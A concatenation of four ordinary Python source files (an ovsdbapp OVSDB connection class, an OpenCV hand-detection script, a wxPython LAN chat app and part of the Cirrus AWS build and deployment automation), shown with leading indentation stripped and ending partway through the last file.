connection.py
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import queue
import threading
import time
import traceback
from ovs.db import custom_index
from ovs.db import idl
from ovs import poller
from ovsdbapp.backend.ovs_idl import idlutils
from ovsdbapp import exceptions
if os.name == 'nt':
from ovsdbapp.backend.ovs_idl.windows import connection_utils
else:
from ovsdbapp.backend.ovs_idl.linux import connection_utils
LOG = logging.getLogger(__name__)
class TransactionQueue(queue.Queue, object):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._wait_queue = connection_utils.WaitQueue(
max_queue_size=self.maxsize)
def get_nowait(self, *args, **kwargs):
try:
result = super().get_nowait(*args, **kwargs)
except queue.Empty:
return None
self._wait_queue.alert_notification_consume()
return result
def put(self, *args, **kwargs):
super().put(*args, **kwargs)
self._wait_queue.alert_notify()
@property
def alert_fileno(self):
return self._wait_queue.alert_fileno
class Connection(object):
def __init__(self, idl, timeout):
"""Create a connection to an OVSDB server using the OVS IDL
:param timeout: The timeout value for OVSDB operations
:param idl: A newly created ovs.db.Idl instance (run never called)
"""
self.timeout = timeout
self.txns = TransactionQueue(1)
self.lock = threading.RLock()
self.idl = idl
self.thread = None
self.is_running = None
def start(self):
"""Start the connection."""
with self.lock:
if self.thread is not None:
return False
if not self.idl.has_ever_connected() or self.is_running is False:
if self.is_running is False: # stop() was called
self.idl.force_reconnect()
idlutils.wait_for_change(self.idl, self.timeout)
try:
self.idl.post_connect()
except AttributeError:
# An ovs.db.Idl class has no post_connect
pass
self.poller = poller.Poller()
self.is_running = True
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start()
def run(self):
errors = 0
while self.is_running:
# If we fail in an Idl call, we could have missed an update
# from the server, leaving us out of sync with ovsdb-server.
# It is not safe to continue without restarting the connection.
# Though it is likely that the error is unrecoverable, keep trying
# indefinitely just in case.
try:
self.idl.wait(self.poller)
self.poller.fd_wait(self.txns.alert_fileno, poller.POLLIN)
self.poller.block()
with self.lock:
self.idl.run()
except Exception as e:
# This shouldn't happen, but is possible if there is a bug
# in python-ovs
errors += 1
LOG.exception(e)
with self.lock:
self.idl.force_reconnect()
try:
idlutils.wait_for_change(self.idl, self.timeout)
except Exception as e:
# This could throw the same exception as idl.run()
# or Exception("timeout"), either way continue
LOG.exception(e)
sleep = min(2 ** errors, 60)
LOG.info("Trying to recover, sleeping %s seconds", sleep)
time.sleep(sleep)
continue
errors = 0
txn = self.txns.get_nowait()
if txn is not None:
try:
with self.lock:
txn.results.put(txn.do_commit())
except Exception as ex:
er = idlutils.ExceptionResult(ex=ex,
tb=traceback.format_exc())
txn.results.put(er)
self.txns.task_done()
self.idl.close()
def stop(self, timeout=None):
if not self.is_running:
return True
self.is_running = False
self.txns.put(None)
self.thread.join(timeout)
if self.thread.is_alive():
return False
self.thread = None
return True
def queue_txn(self, txn):
# Even if we aren't started, we can queue a transaction and it will
# run when we are started
try:
self.txns.put(txn, timeout=self.timeout)
except queue.Full as e:
raise exceptions.TimeoutException(commands=txn.commands,
timeout=self.timeout,
cause='TXN queue is full') from e
class OvsdbIdl(idl.Idl):
def cooperative_yield(self):
time.sleep(0)
@classmethod
def from_server(cls, connection_string, schema_name, *args,
helper=None, helper_tables=None, **kwargs):
"""Create the Idl instance by pulling the schema from OVSDB server
:param connection_string: Connection name
:type connection_string: string
:param schema_name: Schema name
:type schema: string
:param helper: Helper instance
:type helper: ``idl.SchemaHelper``
:param helper_tables: Tables to be registered in the helper
:type helper_tables: Iterator of strings
"""
if not helper:
helper = idlutils.get_schema_helper(connection_string, schema_name)
if not helper_tables:
helper.register_all()
else:
for table in helper_tables:
helper.register_table(table)
return cls(connection_string, helper, **kwargs)
def post_connect(self):
"""Operations to execute after the Idl has connected to the server
An example would be to set up Idl notification handling for watching
and unwatching certain OVSDB change events
"""
def update_tables(self, tables, schema):
"""Add the tables to the current Idl if they are present in the schema
:param tables: List of tables to be registered
:type tables: List
:param schema: Schema description
:type schema: dict or string
"""
schema_helper = idlutils.create_schema_helper(schema)
# Register only available registered tables - DB downgrade, and the
# newly added tables - DB upgrade
for table in self.tables.keys() | tables:
if table in schema_helper.schema_json['tables']:
schema_helper.register_table(table)
schema = schema_helper.get_idl_schema()
self._db = schema
self.tables = schema.tables
for table in schema.tables.values():
for column in table.columns.values():
if not hasattr(column, 'alert'):
column.alert = True
table.need_table = False
table.rows = custom_index.IndexedRows(table)
table.idl = self
table.condition = [True]
table.cond_changed = False
|
detect_multi_threaded.py
|
import argparse
import copy
from multiprocessing import Queue
from threading import Thread
from typing import List, Dict
import cv2
from utils import Worker, Calibration
from utils.webcam_video_stream import WebcamVideoStream
from utils.zmq_publisher import HandPositionPublisher, MarkerPublisher
from utils.synchronized_variable import SynchronizedVariable
from lib.state_machine import StateMachine
from lib.command_line_input import CommandLineInput
from lib.opencv_window import OpenCVWindow
from state_implementations.define_aoi_state import DefineAoi
from state_implementations.initial_state import InitialState
from state_implementations.exit_state import ExititingState
from state_implementations.aoi_mkr_selection_state import DefineAoiMarkerSelectionState
from state_implementations.aoi_name_state import DefineAoiNameState
from state_implementations.aoi_draw_state import DefineAoiDrawState
score_thresh = 0.2
if __name__ == '__main__':
# TODO Add option to generate markers
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-img', '--image', dest="image_file", type=open,
default=None,
help='For debugging purposes, you can provide a path '
'to an image. Setting this will ignore the '
'source setting.')
parser.add_argument('-video', '--video', dest="video_file", type=open,
default=None,
help='For debugging purposes, you can provide a path '
'to a video. Setting this will ignore the source '
'setting.')
parser.add_argument('-nhands', '--num_hands', dest='num_hands', type=int,
default=2, help='Max number of hands to detect.')
parser.add_argument('-fps', '--fps', dest='fps', type=int, default=True,
help='Show FPS on detection/display visualization')
parser.add_argument('-wd', '--width', dest='width', type=int, default=888,
help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=500,
help='Height of the frames in the video stream.')
parser.add_argument('-ds', '--display', dest='display', type=int,
default=True,
help='Display the detected images using OpenCV. This '
'reduces FPS')
parser.add_argument('-num-w', '--num-workers', dest='num_workers',
type=int, default=4, help='Number of workers.')
parser.add_argument('-q-size', '--queue-size', dest='queue_size', type=int,
default=5, help='Size of the queue.')
parser.add_argument('-c', '--calibration-file', dest='calibration_file',
type=open, default=None,
help='Camera calibration file.')
args = parser.parse_args()
if args.video_file is not None and args.image_file is not None:
raise ValueError("Provide either video or image file, not both.")
input_q = Queue(maxsize=args.queue_size)
output_q = Queue(maxsize=args.queue_size)
# No max size here, because this would limit the amount of hand/markers
# we're able to detect per frame
center_points_q = Queue()
marker_q = Queue()
cap_params = {}
zmq_publishers = [
HandPositionPublisher(center_points_q),
MarkerPublisher(marker_q)
]
for publisher in zmq_publishers:
publisher.start()
cap_params['score_thresh'] = score_thresh
# max number of hands we want to detect/track
cap_params['num_hands_detect'] = args.num_hands
def next_image(): return
def cleanup(): return
if args.image_file is not None:
image_file = cv2.imread(args.image_file.name)
cap_params['im_width'] = image_file.shape[0]
cap_params['im_height'] = image_file.shape[1]
def next_image(): return copy.deepcopy(image_file)
elif args.video_file is not None:
# If it's a video file, we want the system to take all the time it
# needs to process every single frame. Thus, the frame from the file
# are queued and processed one after another. To guarantee that the
# output is fluid when using a web cam, only the currently captured
# frame is processed.
video_capture = WebcamVideoStream(args.video_file.name, args.width,
args.height, queued=True)\
.start()
cap_params['im_width'] = args.width
cap_params['im_height'] = args.height
def next_image(): return video_capture.read()
def cleanup(): return video_capture.stop()
else:
video_capture = WebcamVideoStream(args.video_source, args.width,
args.height)\
.start()
cap_params['im_width'] = args.width
cap_params['im_height'] = args.height
def next_image(): return cv2.flip(video_capture.read(), 1)
def cleanup(): return video_capture.stop()
if args.calibration_file is not None:
calibration = Calibration(args.calibration_file)
else:
calibration = None
latest_markers: SynchronizedVariable[List[Dict]] = SynchronizedVariable([])
for i in range(args.num_workers):
Thread(target=lambda *args: Worker(*args).run(), daemon=True,
args=(input_q, output_q, marker_q, center_points_q,
cap_params, latest_markers, calibration))\
.start()
window = OpenCVWindow('Multi-Threaded Detection')
window.create()
def cleanup_():
print("Stopping ZMQ publishers...")
for publisher in zmq_publishers:
publisher.cancel()
print("Cleaning up...")
cleanup()
print("Closing OpenCV windows...")
window.destroy()
cli_input = CommandLineInput()
cli_input.start_capture()
InitialState.init_args = (next_image, window)
DefineAoi.init_args = (latest_markers,)
DefineAoi.initial_state = DefineAoiMarkerSelectionState
DefineAoiNameState.init_args = (cli_input,)
DefineAoiMarkerSelectionState.init_args = (window, cli_input)
DefineAoiDrawState.init_args = (window, cli_input)
ExititingState.init_args = (cleanup_,)
state_machine = StateMachine(window, cli_input, input_q, output_q, args.fps,
args.display)
state_machine.enter_state(InitialState)
running = True
while True:
exit_state = state_machine.run()
if not running:
break
if isinstance(state_machine.current_state, ExititingState):
running = False
|
ZyqChat.py
|
import wx
import threading
import socket
from time import sleep, ctime
from enum import Enum, IntEnum, unique
import os
import sys
import signal
import getpass
class StyleList(Enum):
OUTPUT = 2
SEND = 3
RECE = 4
class MyStyle(wx.TextAttr):
def __init__(self, style = None):
wx.TextAttr.__init__(self)
self.SetAlignment(wx.TEXT_ALIGNMENT_LEFT)
self.SetFontSize(12)
self.__SetSty(style)
def __SetSty(self, style):
if StyleList.OUTPUT == style:
self.SetTextColour(wx.RED)
elif StyleList.SEND == style:
self.SetTextColour(wx.Colour(30,25,125))
self.SetAlignment(wx.TEXT_ALIGNMENT_RIGHT)
self.SetParagraphSpacingBefore(20)
elif StyleList.RECE == style:
self.SetTextColour(wx.BLUE)
self.SetAlignment(wx.TEXT_ALIGNMENT_LEFT)
self.SetParagraphSpacingBefore(20)
else:
pass
class Data():
__remoteIp = ''
@classmethod
def GetLocalIp(cls):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
s.close()
return ip
@classmethod
def GetHostName(cls):
hostName = socket.gethostname()
return hostName
@classmethod
def GetUser(cls):
user = getpass.getuser()
return user
@classmethod
def GetServerPort(cls):
return 12345
@classmethod
def GetClientPort(cls):
return 54321
@classmethod
def SetRemoteIp(cls,remoteIp):
Data.__remoteIp = remoteIp
@classmethod
def GetRemoteIp(cls):
return Data.__remoteIp
class MyServer(socket.socket):
def __init__(self):
socket.socket.__init__(self,socket.AF_INET,socket.SOCK_STREAM)
self.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.bind((Data.GetLocalIp(),Data.GetServerPort()))
self.listen(1)
def CreateMyServer(self):
try:
self.conn, self.add = self.accept()
except Exception as e:
self.close()
if ChatWindow.tclock.acquire():
#newWin.outMsg.Clear()
#newWin.outMsg.AppendText(str(e)+'1\n')
ChatWindow.tclock.release()
else:
newWin.Connected(False,self.add[0])
self.SeReceive()
def SeReceive(self):
while True:
try:
info = self.conn.recv(1024).decode()
except Exception as e:
self.close()
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
newWin.StartServer()
break
else:
if ChatWindow.tclock.acquire():
ll = newWin.outMsg.GetLastPosition()
newWin.outMsg.AppendText(info+'\n')
l = newWin.outMsg.GetLastPosition()
newWin.outMsg.SetStyle(ll,l,MyStyle(StyleList.RECE))
ChatWindow.tclock.release()
class MyClient(socket.socket):
def __init__(self):
socket.socket.__init__(self,socket.AF_INET,socket.SOCK_STREAM)
self.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.bind((Data.GetLocalIp(),Data.GetClientPort()))
return
def CreatMyClient(self):
try:
self.connect((Data.GetRemoteIp(),Data.GetServerPort()))
except Exception as e:
self.close()
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
newWin.StartServer()
else:
newWin.Connected(True,Data.GetRemoteIp())
self.Receive()
def Receive(self):
while True:
try:
info = self.recv(1024).decode()
except Exception as e:
self.close()
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
newWin.StartServer()
break
else:
if ChatWindow.tclock.acquire():
ll = newWin.outMsg.GetLastPosition()
newWin.outMsg.AppendText(info+'\n')
l = newWin.outMsg.GetLastPosition()
newWin.outMsg.SetStyle(ll,l,MyStyle(StyleList.RECE))
ChatWindow.tclock.release()
class ChatWindow(wx.Frame):
tclock = threading.Lock()
flag = False
def __init__(self, parent, title):
super().__init__(parent,title=title,size=(400,600))
self.InitUI()
self.Center()
self.Show()
self.StartServer()
def InitUI(self):
self.panel = wx.Panel(self)
self.hostAddress = wx.TextCtrl(self.panel, style = wx.TE_RICH|wx.TE_RICH2)
self.inputMsg = wx.TextCtrl(self.panel, style = wx.TE_RICH|wx.TE_RICH2|wx.TE_PROCESS_ENTER)
self.inputMsg.Bind(wx.EVT_TEXT_ENTER,self.SentEvent)
self.connectButton = wx.Button(self.panel,label = '连接')
self.connectButton.Bind(wx.EVT_BUTTON,self.ClickConnectButton)
self.outMsg = wx.TextCtrl(self.panel, style = wx.TE_MULTILINE|wx.TE_READONLY|wx.TE_RICH|wx.TE_RICH2)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
self.vBox = wx.BoxSizer(wx.VERTICAL)
self.hBox1.Add(self.hostAddress, proportion = 10, flag = wx.EXPAND|wx.ALL, border = 3)
self.hBox1.Add(self.connectButton, proportion = 1, flag = wx.EXPAND|wx.ALL, border = 3)
self.hBox2.Add(self.inputMsg, proportion = 10, flag = wx.EXPAND|wx.ALL, border = 3)
self.vBox.Add(self.hBox1, proportion = 1, flag = wx.EXPAND|wx.ALL,border = 3)
self.vBox.Add(self.outMsg, proportion = 10, flag = wx.EXPAND|wx.ALL,border = 6)
self.vBox.Add(self.hBox2, proportion = 1, flag = wx.EXPAND|wx.ALL,border = 3)
self.panel.SetSizer(self.vBox) # 设置主尺寸器
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
def OnCloseWindow(self, event):
dial = wx.MessageDialog(None, 'Are you sure to quit?','Question', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)
ret = dial.ShowModal()
if ret == wx.ID_YES:
self.server.close()
try:
self.client.close()
except:
pass
self.Destroy()
else:
event.Veto()
def ClickConnectButton(self, event):
if ChatWindow.flag == False:
self.server.close()
self.client = MyClient()
Data.SetRemoteIp(self.hostAddress.GetValue())
self.hostAddress.Clear()
self.hostAddress.Enable(False)
self.connectButton.Enable(False)
self.outMsg.Clear()
self.outMsg.AppendText("连接中………………\n")
self.ctd = threading.Thread(target = self.client.CreatMyClient)
self.ctd.start()
elif ChatWindow.flag == True:
try:
self.server.conn.close()
except:
pass
finally:
try:
self.server.close()
except:
pass
try:
self.client.close()
except:
pass
self.outMsg.AppendText("已断开\n")
def SentEvent(self, event):
if self.std.isAlive():
try:
self.server.conn.send(self.inputMsg.GetValue().encode())
except Exception as e:
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
elif self.ctd.isAlive():
try:
self.client.send(self.inputMsg.GetValue().encode())
except Exception as e:
if ChatWindow.tclock.acquire():
newWin.outMsg.Clear()
newWin.outMsg.AppendText(str(e)+'\n')
ChatWindow.tclock.release()
if ChatWindow.tclock.acquire():
ll = self.outMsg.GetLastPosition()
self.outMsg.AppendText(self.inputMsg.GetValue() +'\n')
l = self.outMsg.GetLastPosition()
self.outMsg.SetStyle(ll,l,MyStyle(StyleList.SEND))
self.inputMsg.Clear()
self.inputMsg.SetDefaultStyle(MyStyle())
ChatWindow.tclock.release()
def StartServer(self):
ChatWindow.flag = False
self.hostAddress.Enable(True)
self.hostAddress.SetDefaultStyle(MyStyle())
self.connectButton.Enable(True)
self.connectButton.SetLabel("连接")
self.inputMsg.Enable(False)
self.inputMsg.SetDefaultStyle(MyStyle())
self.outMsg.SetDefaultStyle(MyStyle(StyleList.OUTPUT))
self.outMsg.AppendText('==========================\n')
self.outMsg.AppendText('请输入对方IP进行连接\n')
self.outMsg.AppendText('******或者****************\n')
self.outMsg.AppendText('等待对方与你进行连接\n')
self.outMsg.AppendText('--------------------------\n')
self.outMsg.AppendText('你的IP为:【' + Data.GetLocalIp() + '】\n')
self.outMsg.AppendText('==========================\n')
self.server = MyServer()
self.std = threading.Thread(target = self.server.CreateMyServer)
self.std.start()
def Connected(self,mode,ip = '0.0.0.0'):
ChatWindow.flag = True
self.inputMsg.Enable(True)
self.hostAddress.Clear()
self.hostAddress.Enable(False)
self.connectButton.Enable(True)
self.connectButton.SetLabel("断开")
self.outMsg.Clear()
self.outMsg.AppendText("==================================\n")
if mode == True:
self.outMsg.AppendText("【你】已与【" + ip + "】连接成功\n")
else:
self.outMsg.AppendText("【" + ip + "】"+ "已与【你】连接成功\n")
self.outMsg.AppendText("**********************************\n")
self.outMsg.AppendText("【你们】可以愉快的进行聊天了\n")
self.outMsg.AppendText("==================================\n")
if __name__ == "__main__":
app = wx.App()
newWin = ChatWindow(None, title='ZZ_CHAT')
app.MainLoop()
|
automate.py
|
import logging
import time
import io
import zipfile
import json
import threading
import inspect
import datetime
from . import handler
from . import configuration
from .instance import Instance
from . import utilities
from .resources import resources
# The type of instance to use for compilation.
BUILD_INSTANCE_TYPE = "c4.4xlarge"
# The disk size, in GB, to use for compilation.
BUILD_INSTANCE_SIZE = 32
# The type of instance to use for creating server images.
SERVER_INSTANCE_TYPE = "m4.2xlarge"
# The disk size, in GB, to use for parameter servers.
SERVER_INSTANCE_SIZE = 1
# The base AMI to use for making the Amazon Linux build image. Gives the AMI ID
# for each supported region. This is "amzn-ami-hvm-2017.03.1.20170812
# -x86_64-gp2", which is recommended by AWS as of Sep 27, 2018 for compiling
# executables for Lambda.
AMAZON_BASE_IMAGES = {
"us-east-1": "ami-4fffc834",
"us-east-2": "ami-ea87a78f",
"us-west-1": "ami-3a674d5a",
"us-west-2": "ami-aa5ebdd2"
}
# The base AMI to use for making the Ubuntu build image. Gives the AMI ID for
# each supported region. This is "Ubuntu Server 18.04 LTS (HVM), SSD Volume
# Type", found in the AWS console.
UBUNTU_BASE_IMAGES = {
"us-east-1": "ami-0ac019f4fcb7cb7e6",
"us-east-2": "ami-0f65671a86f061fcd",
"us-west-1": "ami-063aa838bd7631e0b",
"us-west-2": "ami-0bbe6b35405ecebdb"
}
# The ARN of an IAM policy that allows read-only access to S3.
S3_READ_ONLY_ARN = "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"
# The ARN of an IAM policy that allows write access to Cloudwatch logs.
CLOUDWATCH_WRITE_ARN = "arn:aws:iam::aws:policy/service-role/" \
"AWSLambdaBasicExecutionRole"
# The base name of the bucket created by Cirrus in users' AWS accounts.
BUCKET_BASE_NAME = "cirrus-bucket"
# The estimated delay of IAM's eventual consistency, in seconds.
IAM_CONSISTENCY_DELAY = 20
# The filenames of Cirrus' executables.
EXECUTABLES = ("parameter_server", "ps_test", "csv_to_libsvm")
# The level of compression to use when creating the Lambda ZIP package.
LAMBDA_COMPRESSION = zipfile.ZIP_DEFLATED
# The name to give to the file containing the Lambda's handler code.
LAMBDA_HANDLER_FILENAME = "handler.py"
# The estimated delay of S3's eventual consistency, in seconds.
S3_CONSISTENCY_DELAY = 20
# The runtime for the worker Lambda.
LAMBDA_RUNTIME = "python3.6"
# The fully-qualified identifier of the handler of the worker Lambda.
LAMBDA_HANDLER_FQID = "handler.run"
# The maximum execution time to give the worker Lambda, in seconds.
LAMBDA_TIMEOUT = 5 * 60
# The maximum amount of time that we will wait after invoking a Lambda in order
# to read its output, in seconds.
LAMBDA_READ_TIMEOUT = LAMBDA_TIMEOUT + 30
# The level of logs that the worker Lambda should write to CloudWatch.
LAMBDA_LOG_LEVEL = "DEBUG"
# The maximum number of generations of Lambdas that will be invoked to serve as
# as the worker with a given ID.
MAX_LAMBDA_GENERATIONS = 10000
# The maximum number of workers that may work on a given experiment. This is
# 1000 because the worker ID is given 3 digits in the task ID that workers use
# to register.
MAX_WORKERS_PER_EXPERIMENT = 1000
# The minimum number of seconds that must pass between two Lambda invocations
# for a worker.
MIN_GENERATION_TIME = 10
# The minimum number of concurrent executions that AWS requires an account to
# keep unreserved. Current as of 11/21/18.
_MINIMUM_UNRESERVED_CONCURRENCY = 100
def make_amazon_build_image(name):
"""Make an Amazon Linux AMI suitable for compiling Cirrus on.
Deletes any existing AMI with the same name. The resulting AMI will be
private.
Args:
name (str): The name to give the AMI.
"""
log = logging.getLogger("cirrus.automate.make_amazon_build_image")
log.debug("Deleting any existing images with the same name.")
Instance.delete_images(name)
log.debug("Launching an instance.")
region = configuration.config()["aws"]["region"]
instance = Instance("cirrus_make_amazon_build_image",
ami_id=AMAZON_BASE_IMAGES[region],
disk_size=BUILD_INSTANCE_SIZE,
typ=BUILD_INSTANCE_TYPE,
username="ec2-user")
instance.start()
log.debug("Setting up the environment.")
# Install some necessary packages.
instance.run_command("yes | sudo yum install git "
"glibc-static openssl-static.x86_64 zlib-static.x86_64 libcurl-devel")
instance.run_command("yes | sudo yum groupinstall \"Development Tools\"")
# Install some useful tools.
instance.run_command("yes | sudo yum install gdb")
instance.run_command("yes | sudo yum install htop")
instance.run_command("yes | sudo yum install mosh")
# The above installed a recent version of gcc, but an old version of g++.
# Install a newer version of g++.
instance.run_command("yes | sudo yum remove gcc48-c++")
instance.run_command("yes | sudo yum install gcc72-c++")
# The above pulled in an old version of cmake. Install a newer version of
# cmake by compiling from source.
instance.run_command(
"wget https://cmake.org/files/v3.10/cmake-3.10.0.tar.gz")
instance.run_command("tar -xvzf cmake-3.10.0.tar.gz")
instance.run_command("cd cmake-3.10.0; ./bootstrap")
instance.run_command("cd cmake-3.10.0; make -j 16")
instance.run_command("cd cmake-3.10.0; sudo make install")
# Install newer versions of as and ld.
instance.run_command("yes | sudo yum install binutils")
# The above pulled in an old version of make. Install a newer version of
# make by compiling from source.
instance.run_command("wget https://ftp.gnu.org/gnu/make/make-4.2.tar.gz")
instance.run_command("tar -xf make-4.2.tar.gz")
instance.run_command("cd make-4.2; ./configure")
instance.run_command("cd make-4.2; make -j 16")
instance.run_command("cd make-4.2; sudo make install")
instance.run_command("sudo ln -sf /usr/local/bin/make /usr/bin/make")
# Compile glibc from source with static NSS. Use the resulting libpthread.a
# instead of the default.
instance.run_command("git clone git://sourceware.org/git/glibc.git")
instance.run_command("cd glibc; git checkout release/2.28/master")
instance.run_command("mkdir glibc/build")
instance.run_command("cd glibc/build; ../configure --disable-sanity-checks "
"--enable-static-nss --prefix ~/glibc_build")
instance.run_command("cd glibc/build; make -j 16")
instance.run_command("cd glibc/build; make install")
instance.run_command("sudo cp ~/glibc_build/lib/libpthread.a "
"/usr/lib64/libpthread.a")
instance.run_command("sudo cp ~/glibc_build/lib/libc.a /usr/lib64/libc.a")
log.debug("Saving the image.")
instance.save_image(name, False)
log.debug("Terminating the instance.")
instance.cleanup()
def make_ubuntu_build_image(name):
"""Make an Ubuntu AMI suitable for compiling Cirrus on.
Deletes any existing AMI with the same name. The resulting AMI will be
private.
Args:
name (str): The name to give the AMI.
"""
log = logging.getLogger("cirrus.automate.make_ubuntu_build_image")
log.debug("Deleting any existing images with the same name.")
Instance.delete_images(name)
log.debug("Launching an instance.")
region = configuration.config()["aws"]["region"]
instance = Instance("cirrus_make_ubuntu_build_image",
ami_id=UBUNTU_BASE_IMAGES[region],
disk_size=BUILD_INSTANCE_SIZE,
typ=BUILD_INSTANCE_TYPE,
username="ubuntu")
instance.start()
log.debug("Setting up the environment.")
# Sometimes `apt-get update` doesn't work, returning exit code 100.
while True:
status, _, _ = instance.run_command("sudo apt-get update", False)
if status == 0:
break
instance.run_command("yes | sudo apt-get install build-essential cmake \
automake zlib1g-dev libssl-dev libcurl4-nss-dev \
bison libldap2-dev libkrb5-dev")
instance.run_command("yes | sudo apt-get install awscli")
# Install some useful tools.
instance.run_command("yes | sudo apt-get install gdb")
instance.run_command("yes | sudo apt-get install htop")
instance.run_command("yes | sudo apt-get install mosh")
log.debug("Saving the image.")
instance.save_image(name, False)
log.debug("Terminating the instance.")
instance.cleanup()
def make_executables(path, image_owner_name, username):
"""Compile Cirrus and publish its executables.
Overwrites any existing S3 objects with the same name. The resulting S3
objects will be public.
Args:
path (str): A S3 path to a "directory" in which to publish the
executables.
image_owner_name (tuple[str, str]): The owner and name of the AMI to
compile on. As for `Instance.__init__`.
username (str): The SSH username to use with the AMI.
"""
log = logging.getLogger("cirrus.automate.make_executables")
log.debug("Launching an instance.")
instance = Instance("cirrus_make_executables",
ami_owner_name=image_owner_name,
disk_size=BUILD_INSTANCE_SIZE,
typ=BUILD_INSTANCE_TYPE,
username=username)
instance.start()
log.debug("Building Cirrus.")
instance.run_command("git clone https://github.com/jcarreira/cirrus.git")
instance.run_command("cd cirrus; ./bootstrap.sh")
instance.run_command("cd cirrus; make -j 16")
log.debug("Publishing executables.")
for executable in EXECUTABLES:
instance.upload_s3("~/cirrus/src/%s" % executable,
path + "/" + executable, public=True)
log.debug("Terminating the instance.")
instance.cleanup()
log.debug("Done.")
def make_lambda_package(path, executables_path):
"""Make and publish the ZIP package for Cirrus' Lambda function.
Args:
path (str): An S3 path at which to publish the package.
executables_path (str): An S3 path to a "directory" from which to get
Cirrus' executables.
"""
assert path.startswith("s3://")
assert executables_path.startswith("s3://")
log = logging.getLogger("cirrus.automate.make_lambda_package")
log.debug("Initializing ZIP file.")
file = io.BytesIO()
with zipfile.ZipFile(file, "w", LAMBDA_COMPRESSION) as zip:
log.debug("Writing handler.")
info = zipfile.ZipInfo(LAMBDA_HANDLER_FILENAME)
info.external_attr = 0o777 << 16 # Gives execute permission.
handler_source = inspect.getsource(handler)
zip.writestr(info, handler_source)
log.debug("Initializing S3.")
executable = io.BytesIO()
log.debug("Downloading executable.")
executables_path += "/amazon/parameter_server"
bucket, key = _split_s3_url(executables_path)
resources.s3_client.download_fileobj(bucket, key, executable)
log.debug("Writing executable.")
info = zipfile.ZipInfo("parameter_server")
info.external_attr = 0o777 << 16 # Gives execute permission.
executable.seek(0)
zip.writestr(info, executable.read())
log.debug("Uploading package.")
file.seek(0)
bucket, key = _split_s3_url(path)
resources.s3_client.upload_fileobj(file, bucket, key,
ExtraArgs={"ACL": "public-read"})
log.debug("Waiting for changes to take effect.")
# Waits for S3's eventual consistency to catch up. Ideally, something more
# sophisticated would be used since the delay distribution is
# heavy-tailed. But this should in most cases ensure the package is
# visible on S3 upon return.
time.sleep(S3_CONSISTENCY_DELAY)
log.debug("Done.")
def make_server_image(name, executables_path):
"""Make an AMI that runs parameter servers.
Args:
name (str): The name to give the AMI.
executables_path (str): An S3 path to a "directory" from which to get
Cirrus' executables.
"""
assert executables_path.startswith("s3://")
log = logging.getLogger("cirrus.automate.make_server_image")
log.debug("Checking for already-existent images.")
Instance.delete_images(name)
log.debug("Launching an instance.")
region = configuration.config()["aws"]["region"]
instance = Instance("cirrus_make_server_image",
ami_id=UBUNTU_BASE_IMAGES[region],
disk_size=SERVER_INSTANCE_SIZE,
typ=SERVER_INSTANCE_TYPE,
username="ubuntu")
instance.start()
log.debug("Putting parameter_server executable on instance.")
instance.download_s3(executables_path + "/ubuntu/parameter_server",
"~/parameter_server")
log.debug("Setting permissions of executable.")
instance.run_command("chmod +x ~/parameter_server")
log.debug("Creating image from instance.")
instance.save_image(name, False)
log.debug("Terminating the instance.")
instance.cleanup()
log.debug("Done.")
def get_bucket_name():
"""Get the name of Cirrus' S3 bucket in the user's AWS account.
Returns:
str: The name.
"""
log = logging.getLogger("cirrus.automate.get_bucket_name")
log.debug("Retreiving account ID.")
account_id = resources.sts_client.get_caller_identity().get("Account")
return BUCKET_BASE_NAME + "-" + account_id
def set_up_bucket():
"""Set up Cirrus' S3 bucket in the user's AWS account.
"""
log = logging.getLogger("cirrus.automate.set_up_bucket")
log.debug("Checking for existing bucket.")
response = resources.s3_client.list_buckets()
exists = False
bucket_name = get_bucket_name()
for bucket_info in response["Buckets"]:
if bucket_info["Name"] == bucket_name:
exists = True
break
if exists:
log.debug("Deleting contents of existing bucket.")
bucket = resources.s3_resource.Bucket(bucket_name)
for obj in bucket.objects.all():
obj.delete()
log.debug("Deleting existing bucket.")
bucket.delete()
log.debug("Creating bucket.")
constraint = configuration.config()["aws"]["region"]
bucket_config = {
"LocationConstraint": constraint
}
# Per https://docs.aws.amazon.com/general/latest/gr/rande.html#s3_region, no
# constraint should be provided when referring to the us-east-1 region.
if constraint == "us-east-1":
resources.s3_resource.create_bucket(
Bucket=bucket_name
)
else:
resources.s3_resource.create_bucket(
Bucket=bucket_name,
CreateBucketConfiguration=bucket_config
)
def get_available_concurrency():
"""Get the number of unreserved concurrent executions available in the
current AWS account.
Returns:
int: The number of executions.
"""
log = logging.getLogger("cirrus.automate.get_available_concurrency")
log.debug("Getting account settings.")
response = resources.lambda_client.get_account_settings()
unreserved = response["AccountLimit"]["UnreservedConcurrentExecutions"]
available = unreserved - _MINIMUM_UNRESERVED_CONCURRENCY
log.debug("Done.")
return available
def set_up_lambda_role(name):
"""Set up the IAM role for the worker Lambda function.
